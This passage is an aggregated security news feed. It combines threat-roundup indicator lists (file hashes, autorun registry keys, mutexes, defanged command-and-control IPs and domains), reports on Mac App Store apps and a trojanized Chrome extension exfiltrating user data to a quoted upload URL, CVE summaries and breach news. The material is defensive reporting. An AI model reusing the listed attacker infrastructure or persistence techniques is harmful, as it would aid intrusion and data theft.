  • 1027dcf0ac13ba9da3a74edd293537bb91a0aa56a6bc35037dd07d0e7c134785
  • 10def6ce3d027c88fdd6d14f8d48cbcf1bea538c6c5d7bba1535b7da8538d625
  • 115e66ae406dc1849e4436bd5123aa11a23140d0e5499df0db4a79bc54d9b0a2
  • 19299ca446bd6e4f35f779b6645e754c447b4b3c3eff47b52ed35dc2f4b9c33a
  • 204fade0f54fcc7004a5c92e267c4b10f2c7e34abe2c23d81148a1da050cd0c4
  • 20b3fd1e9b961bd1ebf99ef2acaf836fd222e7e8e275ee5fe98d147007956476
  • 2411c862c3a10016a8c77ca30260edd0b1578681b2c0e7efb283305d1a06a2d6
  • 24e266c12f9624da9ffb2dfe7ee7ed47aeba644f269389ff65360b2ffdfa665b
  • 26af093d1ec8917ad9e3bdfeb0bb6d0d03d29f936f61e3f3d5f54b3758934cff
  • 2b849aca5039234ac9b5e82e02f1c4f4aef45722f76acb1a340a6077f53f5c30
  • 352db4336e0b680ceede9e99aac261e4181201d1cad868215986cd54f2391efa
  • 36f67278cb1b1667ca13192886f46a2a446a77a87718ba41db95c60493bb33e8
  • 37832082f728da1bacdf336f3781f3fbc2678bb7231369eaffd4bc4c6444c64d
  • 3b738dd4585e5b66bb122670c9e84042111999c9e20e62b0e5e52d475e5b5f5b
  • 4bfb545cbbae97c960f49c26525ac7b138049f1921d007b597c0196a4d9d36ec
  • 4ce483f322ebfbcb4860fa610b9b4b1970423901ae8df689cf5363fa4306a353
  • 4e6b73e7da25b55ddfd245bfba2edd5a184c8b4ad7e5580ba592be66006b0264
  • 4f73d7c59c7f1373e99d93cc4ba0babbe1fcc366269c427753b4a431ad97af8a
  • 584f0539d4110583adacb68d2e38d05164aeeabfec95a0826c3a495dd41059c4
  • 61d340302fafed7644737b27631807d326d68acec8c32462adb5be6668af3a1a
  • 6a85007df58be36c0a7010cd2e153a5949af8e54575a5f3633fbd1e73ec0672c
  • 6d25187f8c2b1d9dbd4ec7daa8239839acd599c263ef5a7d1892be7c755e6209
  • 6d4da277bb48fa1afdeb949e7a806ed3b02dd738c824aa64b4992b5b05ecd23f
  • 7282cdd99960d70cd2baa1526b15aa59a5983c0de21d6b3e65bfd9b140975175
  • 745d9941a7ac2aa275e81dbcbdf4288cc6a04f9e480318ad3c43cad77131473e

Coverage


Screenshots of Detection

AMP






ThreatGrid




Umbrella





Doc.Dropper.Chronos-6667983-0


Indicators of Compromise


Registry Keys
  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\NETBT\PARAMETERS\INTERFACES\TCPIP_{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}
    • Value Name: DhcpNetbiosOptions
  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\NETBT\PARAMETERS\INTERFACES\TCPIP_{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}
    • Value Name: DhcpNameServerList
  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS\INTERFACES\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}
    • Value Name: DhcpDefaultGateway
  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS\INTERFACES\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}
    • Value Name: DhcpNameServer
  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS\INTERFACES\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}
    • Value Name: DhcpDefaultGateway
  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS\INTERFACES\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}
    • Value Name: DhcpSubnetMaskOpt
  • <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\Certificates
  • <HKLM>\Software\Wow6432Node\Microsoft\SystemCertificates\Root
  • <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\Certificates
  • <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\CRLs
  • <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\CTLs
  • <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUST\Certificates
  • <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUST\CRLs
  • <HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUST\CTLs
  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CONNECTIONS
    • Value Name: DefaultConnectionSettings
  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
    • Value Name: ProxyEnable
  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
    • Value Name: ProxyServer
  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
    • Value Name: ProxyOverride
  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
    • Value Name: AutoConfigURL
  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
    • Value Name: AutoDetect
  • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CONNECTIONS
    • Value Name: SavedLegacySettings
  • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
    • Value Name: ProxyBypass
  • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
    • Value Name: IntranetName
  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS\INTERFACES\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}
    • Value Name: DhcpInterfaceOptions
Mutexes
  • Global\I98B68E3C
  • Global\M98B68E3C
  • PEM1A4
  • PEM558
  • PEM948
  • PEMBE4
IP Addresses
  • 68[.]203[.]247[.]140
  • 124[.]121[.]192[.]186
  • 176[.]219[.]82[.]79
  • 173[.]236[.]55[.]90
  • 185[.]129[.]3[.]211
  • 24[.]253[.]16[.]214
  • 189[.]253[.]126[.]66
Domain Names
  • withachoice[.]com
Files and or directories created
  • %System32%\config\SYSTEM.LOG1
  • %LocalAppData%\Temp\5jhjztfi.inm.psm1
  • %LocalAppData%\Temp\dgnniruc.yui.ps1
  • %UserProfile%\Documents\20180906\PowerShell_transcript.PC.s2CSwKhg.20180906171831.txt
  • %UserProfile%\157.exe
File Hashes
  • 04bec30f4761ffc717d2dba340c124c37ac85fb926972eb80c0aeb7e34a0b5e5
  • 218ae537669d9dfd02ccf61ca948acef60fdf89104d3e2ef03dcececdb9babbe
  • 54580f2ca416dd89565e0286ddb05c7aed1a5aceeca2766928aa6b90a63f4c34
  • 6969b1dba448683c5b5cfdfe4ccdb9fac72e5e1b67f4534027202571e2b81c15
  • 6bb5037a3a338bea45c96563bd6497a331a9f6efa96bbc5f6536ebc623e7ebb5
  • 79765635b755992b9035560d4e00b550c3690c4a75d4e022b5998f11db4db738
  • 81925e948f9d7d14fe216c3513e9085996d0f9ba1208b0f3e0a2cb69a1843b2f
  • 9c089c555d580ac18b55b2874e92232c5dc86517904ae107ad79cbaf945170d7
  • 9fff7343b067f08e84ff62c3c6c70d514847c19092a07b9d55c6b42025108ff0
  • a0d51ee8ab2770a2587ccc1ad99286463c919a0300010a48b4278594e560f30b
  • a3d5721ae44c6ee97fcffe4d40599fab488d981b6240b8e4514bd744d09990c5
  • bccc98a17302f93b04fddd810bfc194b6382ed6b36fe58c3f8f401e58d36d2be
  • d0bdb2938216c29798bfb752f10c72922b9d8f19f81d838d935f12912ebe23b6

Coverage


Screenshots of Detection

AMP




ThreatGrid



Win.Packed.Generic-6667111-0


Indicators of Compromise


Registry Keys
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value Name: internat.exe
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
    • Value Name: ProxyBypass
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
    • Value Name: IntranetName
  • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
    • Value Name: IntranetName
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
    • Value Name: UNCAsIntranet
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
    • Value Name: AutoDetect
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
    • Value Name: ProxyEnable
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
    • Value Name: ProxyServer
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
    • Value Name: ProxyOverride
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
    • Value Name: AutoConfigURL
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
    • Value Name: AutoDetect
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CONNECTIONS
    • Value Name: SavedLegacySettings
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CONNECTIONS
    • Value Name: DefaultConnectionSettings
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value Name: invidiadriver
Mutexes
  • N/A
IP Addresses
  • N/A
Domain Names
  • rapidgens[.]info
Files and or directories created
  • %LocalAppData%\Temp\AFUVT.bat
  • %LocalAppData%\Temp\AFUVT.txt
  • %AppData%\system32\intelgfx.exe
  • %LocalAppData%\Temp\LFPKG.exe
File Hashes
  • 01856d473c35bfe514c75fcab72b65a38795ee257cbab923a9fbc6ec6048bea8
  • 01cee3dae8d1578107a5229e51cf491d8ec67891f11b41b11df4bcf4f7dfa033
  • 01ecd0f01d99fa67cde837666df5eb89b81876f3f272b77cd9599950f52dcda1
  • 034ac9f6da8dc800ba756c56db6d412ca56ca80bf8809014eb13311e47ed3d0e
  • 044e60eea0295cc8a7d899f194ec94a642e4dc9f344971a7b4e2b62bcbd52589
  • 0466a2a72c2a9b573e18f9f2d6acd5a319ce3e78c8fad29e751c9fe86b0de6ae
  • 047e9ee436182dd252d40aa1ba48eb4da2f03575080f054303a07c52801dd4f0
  • 06283385bae75ca1771192347384d498df104f57feb89fed273a2c90d45173f1
  • 06f5bbf71529e4ee25f23ccc117e1db3cb49a2ad31df2573882e2cdf2b9c5a0e
  • 097da1809fcd49df77925fdb4f8eba77a5ccc888b7d3856101cdd0a2700f2aca
  • 099b04e2c212aceb3851c2532fc57cb59f12cf574a7ce79d3c609e3bd4145db7
  • 0a75f754c2fb13fa8f006ea3781119fe2e48d8fbe516782f658f9e39431f2466
  • 0c93afa3ca6e94e7a97075e7a187e66b060f0e6b520fb3398b69dbd83d14ed7e
  • 0d4d97ddf1d86e17df6203f777f994f162a55aea1eeb3908df1e29b697324c62
  • 0d615bec997e4e9f02a698cd3faf0985f24aa28ecead3e5ee1a8e2602e2f9a9d
  • 0fb822636382d6c306ee21efa4b1a4f0a8e0d4b5e22b704934cef706fcd24de4
  • 1045a01bc6e0bf8bab6c0b51d5ceb8840485a02b698ab3b691466e0e646863ac
  • 11481494804da9f301b47ec5a4caa3e6479e9cf901b54633d4114c7d7706e254
  • 11cb98ac7c0b4b3dce3831ab511c09f8d8d958ef41396b2ef93121b28ac4aa6f
  • 12b84d0786d49c283d7a3dc3c985af8ff371b133b6b8301cab3c2bf839f2ce42
  • 16c0224bbe0e0bb43002fb7f83f8c6eaba16b0873d3455a570f58cc89fa0d762
  • 1822abcaf9005035798b30c09ff722fe2815f298615c5c59f1fb6cb278301161
  • 19456f5162d26996cfc2adf9b7627e4b7566f6fe600cde3764c71523f2dc795a
  • 1a0a601961f2c46525ebdc772126c0fb4f7802b533033f15a5e6217c5f266aca
  • 1b7d7642e95d7d9152b4d8e8c59d7e1d7000996999c62f45d9a51c50d00f1833

Coverage


Screenshots of Detection

AMP




ThreatGrid



No.1 Adware Removal Tool On Apple App Store Caught Spying On Mac Users

A highly popular top-tier app in Apple's Mac App Store that's designed to protect its users from adware and malware threats has been, ironically, found surreptitiously stealing their browsing history without their consent, and sending it to a server in China. What's more concerning? Even after Apple was warned a month ago, the company did not take any action against the app. The app in

Belgium Publishes Law Adapting the Belgian Legal Framework to the GDPR

On September 5, 2018, the Law of 30 July 2018 on the Protection of Natural Persons with regard to the Processing of Personal Data (the “Law”) was published in the Belgian Official Gazette.

This is the second step in adapting the Belgian legal framework to the EU GDPR after the Law of 3 December 2017 Creating the Data Protection Authority, which reformed the Belgian Data Protection Authority.

The Law is available in French and Dutch.

North Korean hacker charged for WannaCry and Sony cyberattacks

U.S. charges North Korean hacker for WannaCry, Sony cyber attacks

The U.S. government on Thursday charged and sanctioned a North Korean hacker for the 2014 Sony hack and the 2017 WannaCry global ransomware cyberattack, U.S. officials said.

The accused, Park Jin Hyok worked as part of a team of hackers, also known as the Lazarus Group, has been charged under the strategy planned by the U.S. government for naming and shaming the hackers in order to prevent future cyber attacks.

According to an FBI wanted poster released on Thursday, Park is identified as an alleged North Korean programmer who is accused of being “part of a state-sponsored hacking organization responsible for some of the costliest computer intrusions in history.”

Those attacks include the Sony Pictures Entertainment hack, the WannaCry attack and “a series of attacks targeting banks across the world that collectively attempted to steal more than one billion dollars,” according to the FBI.

Also Read- Top 9 hacking groups sponsored by governments

The U.S. Treasury Department sanctioned Park, a computer programmer, and the North Korea entity, Chosun Expo Joint Venture, the company he worked for.

The Treasury said the joint venture, also known as Korea Expo Joint Venture, is “a front for the North Korean government,” according to the Justice Department.

“The scale and scope of the cyber-crimes alleged by the complaint is staggering and offensive to all who respect the rule of law and the cyber norms accepted by responsible nations,” said Assistant Attorney General for National Security John C. Demers.

“The complaint alleges that the North Korean government, through a state-sponsored group, robbed a central bank and citizens of other nations, retaliated against free speech in order to chill it half a world away, and created disruptive malware that indiscriminately affected victims in more than 150 other countries, causing hundreds of millions, if not billions, of dollars’ worth of damage.”

Park is also suspected of trying to hack into Lockheed Martin’s THAAD Missile defense system project currently deployed in South Korea. He is suspected of working for North Korea’s Reconnaissance General Bureau, a leading intelligence agency of that country.

The complaint against Park describes a “wide-ranging, multi-year conspiracy to conduct computer intrusions and commit wire fraud by co-conspirators working on behalf of the government of the Democratic People’s Republic of Korea, commonly known as North Korea.”

In 2014, the U.S. officials said unnamed North Korean hackers were responsible for the cyber attacks launched on Sony, which resulted in the loss of internal documents and data.

The hack on Sony Pictures came after Pyongyang sent a letter to the United Nations demanding that the movie production house not move forward with the movie “The Interview,” that showed the North Korean dictator Kim Jong Un in a negative light.

Park exploited multiple social media personas by sending malicious links to individuals involved in the production of the movie, the complaint said. The malicious links carried North Korean-controlled malware.

In 2017, WannaCry ransomware made headlines as one of the most widespread cyber attacks in history that brought up to 3,00,000 computers running Windows operating system in 150 countries to a standstill. Among the victims were Britain’s National Health Service (NHS), which had to close emergency rooms in a number of hospitals due to the hack.

Federal prosecutors have charged Park, who is not in custody, with conspiracy and conspiracy to commit wire fraud.

The Treasury Department, in a press release, said, “North Korea has demonstrated a pattern of disruptive and harmful cyber activity that is inconsistent with the growing consensus on what constitutes responsible state behavior in cyberspace.”

“Our policy is to hold North Korea accountable and demonstrate to the regime that there is a cost to its provocative and irresponsible actions.”

John Demers, the Assistant Attorney General of the National Security Division, said on Thursday, “The department has charged, arrested and imprisoned hackers working for the governments of China, Russia, and Iran. Today, we add the North Korean regime to our list, completing frankly four out of four of our principal adversaries in cyberspace.”

This is the first time the U.S. law enforcement agencies have formally charged a hacker involved in the North Korean “sponsored” cyber attacks. However, North Korea has denied the allegations of hacking.

The post North Korean hacker charged for WannaCry and Sony cyberattacks appeared first on TechWorm.

Mac App Store apps are stealing user data

There is a concerning trend lately in the Mac App Store. Several security researchers have independently found different apps that are collecting sensitive user data and uploading it to servers controlled by the developer. (This is referred to as exfiltrating the data.) Some of this data is actually being sent to Chinese servers, which may not be subject to the same stringent requirements around storage and protection of personally identifiable information like organizations based in the US or EU.

Adware Doctor

Patrick Wardle has recently posted an article detailing the misbehavior of an app named Adware Doctor, which is exfiltrating the following data:

  • Safari history
  • Chrome history
  • Firefox history
  • A list of all running processes
  • A list of software that you have downloaded and from where

Most of this is data that App Store apps should not be accessing, much less exfiltrating. In the case of the list of running processes, the app had to work around blockages that Apple has in place to prevent such apps from accessing that data. The developers found a loophole that allowed them to access that data despite Apple’s restrictions.

The developer of this app is one that we at Malwarebytes have had our eye on since 2015. At that time, we discovered an app on the App Store named Adware Medic—a direct rip-off of my own highly-successful app of the same name, which became Malwarebytes for Mac. We immediately began detecting this, and contacted Apple about removing the app. It was eventually removed, but was replaced soon after by an identical app named Adware Doctor.

We’ve continued to fight against this app, as well as others made by the same developer, and it has been taken down several times now, but in a continued failure of Apple’s review process, is always replaced by a new version before long.

Open Any Files: RAR Support

This app came onto our radar late last year. We’ve seen a number of different scam applications like this, which hijack the system’s functionality for handling documents that the user does not have an appropriate app to open, as a means for advertising other products…most often scams. The typical behavior is that, when the user opens an unfamiliar file, this app (and others like it) opens and promotes some antivirus software for scanning the file or the computer, often telling the user that they might be unable to open the file because they are infected.

Interestingly, this software was designed to promote a what appeared to be a mainstream antivirus product. This seemed like an abuse of an affiliate program for that product.

It turned out that this app’s behavior was very similar to the current behavior of Adware Doctor. It was uploading a file named file.zip to the following URL:

update.appletuner.trendmicro.com/1/upload/search_keywords/

This file contained the following data:

  • Complete Safari browsing and search history
  • Complete Chrome browsing and search history
  • Complete Firefox browsing and search history
  • Complete App Store browsing history

We reported this app to Apple in December 2017. It is still present on the App Store.

As we were investigating, we found it very odd that Open Any Files was promoting Dr. Antivirus on the App Store. This led us to investigate Dr. Antivirus, as well as a number of other apps.

(Recently, Open Any Files stopped exfiltrating this data, but we have retained the evidence from our observations.)

Dr. Antivirus

On investigating, we learned that this app, like most Mac App Store apps, is limited in what it can detect to begin with, due to restrictions imposed by the App Store. However, even within the user folder, most of antivirus apps in the App Store don’t have a good detection rate, and this was no exception.

Worse, however, was that we observed the same pattern of data exfiltration as seen in Open Any Files! We saw the same data being collected and also uploaded in a file named file.zip to the same URL used by Open Any Files.

This file, though, contained an interesting bonus. In addition to the browsing history, it also contained an interesting file named app.plist, which contained detailed information about every application found on the system. (See a short excerpt from the file below, showing only the information listed for Dr. Antivirus.)

It could be argued that it is useful for antivirus software to collect certain limited browsing history leading up to a malware/webpage detection and blocking. But it is very hard to argue to exfiltrate the entire browsing history of all installed browsers regardless of whether the user has encountered malware or not. In addition, there was nothing in the app to inform the user about this data collection, and there was no way to opt out of this data collection.

Dr. Cleaner

Unfortunately, other apps by the same developer are also collecting this data. We observed the same data being collected by Dr. Cleaner, minus the list of installed applications. There is really no good reason for a “cleaning” app to be collecting this kind of user data, even if the users were informed, which was not the case.

Interestingly, we found that the drcleaner[dot]com website was being used to promote these apps. WHOIS records identified an individual living in China, and having a foxmail.com email address, as being the registered owner of the domain.

What does all this mean?

It’s blindingly obvious at this point that the Mac App Store is not the safe haven of reputable software that Apple wants it to be. I’ve been saying this for several years now, as we’ve been detecting junk software in the App Store for almost as long as I’ve been at Malwarebytes. This is not new information, but these issues reveal a depth to the problem that most people are unaware of.

We’ve reported software like this to Apple for years, via a variety of channels, and there is rarely any immediate effect. In some cases, we’ve seen offending apps removed quickly, although sometimes  those same apps have come back quickly (as was the case with Adware Doctor). In other cases, it has taken as long as six months for a reported app to be removed.

In many cases, apps that we have reported are still in the store. Case in point…all of the above.

I strongly encourage you to treat the App Store just like you would any other download location: as potentially dangerous. Be cautious of what you download. A free app from the App Store may seem perfectly innocent and harmless, but if you have to give that app access to any of your data as part of its expected functionality, you can’t know how it will use that data. Worse, even if you don’t give it access, it may find a loophole and get access to sensitive data anyway.

If you download one of these apps and are now regretting it, you can report the app to Apple:

https://reportaproblem.apple.com

Special thanks

Thanks go to folks who have spent their spare time finding and poking at these applications over the last year: PeterNopSled (from the Malwarebytes forums), @privacyis1st, and Patrick Wardle.

The post Mac App Store apps are stealing user data appeared first on Malwarebytes Labs.

Trojanized Extension Uploaded to Google’s Chrome Store

A trojanized version of the MEGA extension was uploaded to the Google Chrome webstore earlier this week and was automatically pushed to users via the autoupdate mechanism.

Through this extension, users get direct access to the MEGA secure cloud storage service in their browser, for improved performance. Also available on Android, the extension is highly popular, with over 1.7 million downloads in the Chrome store (it is also available on MEGA’s website).

On September 4, the cloud storage service announced that an unknown attacker managed to upload a trojanized iteration of the extension (version 3.39.4) to the Google Chrome webstore. The malicious code would immediately be sent to users who had the autoupdate feature enabled.

Once installed, the rogue extension would ask users to allow it to read and change all the data on the websites they visit. Armed with the elevated permissions, the malicious application version would attempt to gather user credentials and send them to a server located in Ukraine, MEGA reveals.

The code was targeting credentials for sites such as amazon.com, live.com, github.com, google.com (for webstore login), myetherwallet.com, mymonero.com, idex.market, and HTTP POST requests to other sites, but did not target mega.nz credentials.

According to MEGA, the rogue extension version was removed from the Chrome store and replaced with a legitimate iteration (version 3.39.5) four hours after the breach occurred. The clean variant was served to users through the autoupdate mechanism. Google removed the extension from the webstore five hours after the breach.

“You are only affected if you had the MEGA Chrome extension installed at the time of the incident, autoupdate enabled and you accepted the additional permission, or if you freshly installed version 3.39.4,” MEGA says.

All users who might have visited sites that send plain-text credentials through POST requests (or used another extension that does so) while the trojanized extension was active likely had their credentials compromised, on those sites and/or applications.

The issue, MEGA says, is that Google disallows publisher signatures on Chrome extensions and only relies on signing them automatically after upload to the Chrome webstore.

Thus, although the company uses “strict release procedures with multi-party code review, robust build workflow and cryptographic signatures where possible,” Google’s policy “removes an important barrier to external compromise.”

Both MEGAsync and the service’s Firefox extension, which are hosted by the company, are signed and “could therefore not have fallen victim to this attack vector,” MEGA claims. The mobile apps, which are hosted by Apple/Google/Microsoft, are also cryptographically signed, therefore immune as well.

The company hasn’t provided details on how the Chrome webstore account was compromised but is investigating the incident.

Related: Google Removes Inline Installation of Chrome Extensions

Related: Half Million Impacted by Four Malicious Chrome Extensions

 

Copyright 2010 Respective Author at Infosec Island

CVE-2018-3952 (nordvpn)

An exploitable code execution vulnerability exists in the connect functionality of NordVPN 6.14.28.0. A specially crafted configuration file can cause a privilege escalation, resulting in the execution of arbitrary commands with system privileges.

CVE-2018-4010 (protonvpn)

An exploitable code execution vulnerability exists in the connect functionality of ProtonVPN VPN client 1.5.1. A specially crafted configuration file can cause a privilege escalation, resulting in the ability to execute arbitrary commands with the system's privileges.

CVE-2017-1114 (campaign)

IBM Campaign 9.1, 9.1.2, and 10 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 121152.

CVE-2017-1115 (campaign)

IBM Campaign 9.1, 9.1.2, and 10 is vulnerable to HTML injection. A remote attacker could inject malicious HTML code, which when viewed, would be executed in the victim's Web browser within the security context of the hosting site. IBM X-Force ID: 121153.

“Shifting Left” Requires Remediation Guidance

Shifting security “left” is about more than simply changing the timing of testing. When security shifts to earlier phases of the development lifecycle, it also changes the players responsible for conducting the testing and addressing the results. In the not-so-distant past, the security team would conduct most security testing late in the software development process, pass the results back “over the wall” to developers, and consider their work done. But with the rise of DevOps, and DevSecOps, finding and fixing security-related defects is a shared responsibility between security and development. In addition, security testing has shifted further left, into the realm of the developer. The development team now has a primary responsibility for security in the development phase, and are responsible for making sure their code gets both scanned and fixed. The security team has more of an oversight role in the development phase, focusing on goals and policy. This is a significant change that requires entirely new tasks, skills, priorities, and mindset. But there is one big blocker to this change: the fact that most developers don’t have secure coding skills. Veracode recently sponsored the 2017 DevSecOps Global Skills Survey from DevOps.com and found that less than one in four developers or other IT pros were required to take a single college course on security. Meanwhile, once developers get on the job, employers aren’t advancing their security training options, either. Approximately 68 percent of developers and IT pros say their organizations don’t provide them adequate training in application security. The bottom line is that most developers won’t know what to do with a long list of security flaws.

It follows that if you shift security left, into developer workflows, without adequate training and guidance – you will not create more secure code, but will in fact delay developer timelines and still produce vulnerable code. Shift left only works when developers get the tools and assistance they need to succeed. And a key part of that is remediation guidance. This adds another new task to the security team’s plate: developer training and coaching.

In their recent report, CISO Playbook: Embedding AST in the Software Development Lifecycle, Gartner notes that “organizations can better support AST early in development by prioritizing AST tools and services that integrate into IDEs and produce actionable findings, with an emphasis on the type and quality of information provided to developers. Tools that are fast but contain little guidance on remediation may not achieve the time savings desired, if developers struggle to understand why a vulnerability was introduced and how to fix it.”*

Ultimately, the speed at which you receive security-testing results is meaningless without the guidance needed to address those results.

We have research that supports this idea as well. Each year for our State of Software Security report, we analyze the data accumulated from all the security assessments we have performed the previous year. In our most recent report, we found that organizations that pick up consulting services that offer analysis and advice to developers alongside the scan results show tremendous improvement in fix rates. We looked at the flaws per MB among the organizations that took advantage of remediation coaching, and those that didn’t – both on their first and last scans of the year. The numbers revealed that remediation consulting can contribute to a whopping 88 percent improvement in an organization’s fix rate. Clearly, if developers are given extra resources to accomplish their security goals, they will make progress on the flaw density in their software.

The bottom line is that application security success is about more than finding security flaws; it’s about fixing them. And in a DevOps world, security and development have to work together to ensure that what gets found gets fixed. Make sure your developers are equipped to fix what they find and truly reduce your application security risk.

To get more best practices on embedding security into the development lifecycle, read the entire Gartner report, CISO Playbook: Embedding AST in the Software Development Lifecycle, mentioned above.

 

*Gartner CISO Playbook: Embedding AST in the Software Development Lifecycle, Ayal Tirosh, Prateek Bhajanka, 13 July 2018

British Airways hacked: 400,000 customers affected

British Airways, UK’s largest airline, has been hacked, the company confirmed on their official website this week. According to a spokesperson who interviewed with The Telegraph, almost 400,000 customers who booked a flight between 22:58 BST August 21 2018 and 21:45 BST September 5 2018 were affected.

Hackers stole customer personal and payment card data from the website and mobile app, however travel and passport information was not compromised. British Airways customers affected by the breach were contacted on Thursday night and will be reimbursed for any financial loss. The airline warns that no emails will be sent out asking customers for their payment card data, so they should stay alert for any identity theft attempts.

Customers should urgently reset their passwords to ensure the safety of their bank accounts. Also, all are advised to monitor their financial situation and reach out to their banks and card providers, especially if they receive suspicious emails on behalf of the airline.

British Airways announced the incident has been resolved and all activity resumed, customers can check in and make bookings. Relevant authorities have been informed and an investigation is ongoing.

“British Airways continues to investigate with the police and cyber specialists, and has reported the data theft to the Information Commissioner,” the company said.

According to a spokesperson, the airline detected the breach when “a third party noticed some unusual activity and informed us about it. We immediately acted to close down the issue, and started an investigation as a matter of urgency.”

IDG Contributor Network: The hidden security problem we all need to know about

Security is something that many enterprise users never want to think about – and often forget about – and those who do think about it assume that it’s running effectively in the background. Unfortunately, daily security breaches show that taking an ostrich approach of burying your head in the sand just doesn’t make them go away.

A key way to combat these breaches is to be as vigilant and up-to-date on security vulnerabilities as possible. Unfortunately, we just can’t rely on tech vendors to keep us informed or protect us from all potential issues. Case in point, there is a key vulnerability in Microsoft Windows that has not received much attention, but one that every enterprise should be aware of: the lack of protection for temporary “tmp” files. While it’s convenient to undo edits in a Word document, for example, the resulting security tradeoff for leaving your file vulnerable is a big one.

To read this article in full, please click here

Happy National Beer Lover’s Day!

Today is National Beer Lover’s Day. How are you celebrating?

At Verisign, we did a quick search on NameStudioTM, our easy-to-use, domain name suggestion tool to see what interesting .com and .net domain names were available to register today … and here are some of our favorites!

AVAILABLE .COM AND .NET DOMAIN NAMES*

.COM

beersforlovers.com
divinebarley.com
everythingale.com
darkmicrobrew.com
icecoldsuds.com
bottleopenerdesigns.com
chugacoldmug.com
thecrazybarrel.com
beermountainsummit.com
letstalkale.com

.NET

beersforlovers.net
divinebarley.net
everythingale.net
darkmicrobrew.net
icecoldsuds.net
bottleopenerdesigns.net
chugacoldmug.net
thecrazybarrel.net
beermountainsummit.net
letstalkale.net

 

What’s yours?

Tell us what great .com and .net domain names you’ve found on NameStudio here.

And check back soon to see what day we’re celebrating next. Better yet, subscribe to the Verisign blog to have the posts delivered directly to your inbox.

Happy National Beer Lover’s Day!


*Available as of September 7, 2018

The user is solely responsible for ensuring that the registration of any domain name listed herein or based on NameStudio domain search data does not violate any third-party trademarks or other intellectual property.

The post Happy National Beer Lover’s Day! appeared first on Verisign Blog.

Vulnerability Spotlight: CVE-2018-3952 / CVE-2018-4010 – Multi-provider VPN Client Privilege Escalation Vulnerabilities

Discovered by Paul Rascagneres.


Overview


Cisco Talos has discovered two similar vulnerabilities in the ProtonVPN and NordVPN VPN clients. The vulnerabilities allow attackers to execute code as an administrator on Microsoft Windows operating systems from a standard user. The vulnerabilities were assigned to the CVE IDs TALOS-2018-0622 / CVE-2018-3952 (NordVPN) and TALOS-2018-0679 / CVE-2018-4010 (ProtonVPN).

